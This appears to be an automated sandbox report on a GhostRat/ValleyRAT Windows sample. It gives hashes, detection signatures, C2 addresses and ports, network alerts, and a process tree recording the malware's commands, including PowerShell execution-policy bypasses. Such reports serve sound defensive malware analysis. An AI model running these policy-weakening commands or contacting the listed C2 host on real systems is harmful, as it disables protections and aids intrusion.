Edit tour

Windows Analysis Report
PKHDJwnF0I.exe

Overview

General Information

Sample name:	PKHDJwnF0I.exe renamed because original name is a hash value
Original sample name:	4F09BB774EC9135BE056F7329EB5BEA5.exe
Analysis ID:	1583832
MD5:	4f09bb774ec9135be056f7329eb5bea5
SHA1:	95f4ff84d83e5d48646c11731ce44b25ecb3f20d
SHA256:	0d40a003f6db399d5fe640b2488ffb9a9de7982add8c18e4dbbf17ca457e31b2
Tags:	exeValleyRATuser-abuse_ch
Infos:

Detection

GhostRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GhostRat

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to capture and log keystrokes

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Loading BitLocker PowerShell Module

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Program Location with Network Connections

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found potential string decryption / allocating functions

Installs a global mouse hook

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sleep loop found (likely to delay execution)

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PKHDJwnF0I.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\PKHDJwnF0I.exe" MD5: 4F09BB774EC9135BE056F7329EB5BEA5)

cmd.exe (PID: 7136 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ShellExperienceHosts.exe (PID: 5780 cmdline: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe MD5: 0922B22053A6D5D9516EA910D34A4771)

cmd.exe (PID: 1772 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6404 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3412 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 404 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

tasklist.exe (PID: 4936 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3176 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 3084 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

tasklist.exe (PID: 732 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6100 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 6104 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

tasklist.exe (PID: 2936 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3584 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 6232 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 5664 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6264 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 5428 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1852 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Configuration

Threatname: GhostRat

{"C2 url": ["156.251.17.243:17093", "156.251.17.243:17094"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2813277197.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3535345010.00000000030D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3535217900.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2650603870.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3140566966.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3535848822.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2650541111.000000000440D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2525280786.000000000088E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3301816914.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2976737282.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2525280786.0000000000871000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2650541111.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3301718971.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2976790913.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.2813511682.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3460158871.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3140624577.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000003.3460049955.0000000004471000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000003.00000002.3535248901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: ShellExperienceHosts.exe PID: 5780	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author
3.3.ShellExperienceHosts.exe.447260b.13.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.8.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.2.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.4.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.30d1053.6.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.5.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.8925fb.0.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.30d1053.6.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.12.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.10.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.11.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.1.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.2.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.2c305bf.5.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.9.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.11.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.32d0000.7.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.2bf1004.4.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.5.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.8925fb.0.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.8.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.447260b.8.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.10.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.7.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.2bf1004.4.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.2c305bf.5.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.4.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.447260b.8.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.12.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.13.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.1.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.2.ShellExperienceHosts.exe.32d0000.7.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.9.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.6.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.6.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
3.3.ShellExperienceHosts.exe.447260b.7.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 31 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, CommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, NewProcessName: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, OriginalFileName: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7136, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ProcessId: 5780, ProcessName: ShellExperienceHosts.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentImage: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentProcessId: 5780, ParentProcessName: ShellExperienceHosts.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 5664, ProcessName: cmd.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 156.251.17.243, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, Initiated: true, ProcessId: 5780, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49831

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6264, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6264, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Anonymous RAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T17:18:58.874542+0100	2052875	1	A Network Trojan was detected	192.168.2.4	49855	156.251.17.243	17093	TCP
2025-01-03T17:20:07.767579+0100	2052875	1	A Network Trojan was detected	192.168.2.4	49880	156.251.17.243	17093	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: ShellExperienceHosts.exe.5780.3.memstrmin

Malware Configuration Extractor: GhostRat {"C2 url": ["156.251.17.243:17093", "156.251.17.243:17094"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Bulete\program\yyzyBase.dll	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\backup.dll	ReversingLabs: Detection: 72%

Multi AV Scanner detection for submitted file

Source: PKHDJwnF0I.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9A6440 CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	3_2_6C9A6440
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9A6560 CryptStringToBinaryA,CryptAcquireContextW,CryptDestroyHash,CryptReleaseContext,	3_2_6C9A6560
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9A68B0 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,	3_2_6C9A68B0

Source: PKHDJwnF0I.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2535753815.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2521338390.0000000002BF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: AnyDesk.exe.0.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR source: powershell.exe, 00000011.00000002.2537362052.0000000007084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf source: powershell.exe, 00000011.00000002.2543631691.000000000822C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\buildslave\unity\build\artifacts\WindowsPlayer\Win32_VS2019_nondev_i_r\WindowsPlayer_Master_il2cpp_x86.pdb source: ShellExperienceHosts.exe, ShellExperienceHosts.exe, 00000003.00000000.1703765856.000000000040C000.00000002.00000001.01000000.00000005.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2537362052.0000000007084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbx source: powershell.exe, 00000011.00000002.2543631691.000000000822C000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: z:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: x:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: v:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: t:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: r:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: p:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: n:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: l:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: j:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: h:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: f:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: b:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: y:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: w:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: u:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: s:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: q:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: o:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: m:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: k:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: i:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: g:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File opened: [:	Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_6C9E410B __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

3_2_6C9E410B

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

3_2_032D80F0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49855 -> 156.251.17.243:17093
Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49880 -> 156.251.17.243:17093

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 156.251.17.243:17093
Source: Malware configuration extractor	URLs: 156.251.17.243:17094

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 156.251.17.243 ports 18852,17093,1,2,5,8

Source: global traffic

TCP traffic: 192.168.2.4:49831 -> 156.251.17.243:18852

Source: Joe Sandbox View

ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243
Source: unknown	TCP traffic detected without corresponding DNS query: 156.251.17.243

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D3360 recv,timeGetTime,_memmove,

3_2_032D3360

Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: PKHDJwnF0I.exe, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
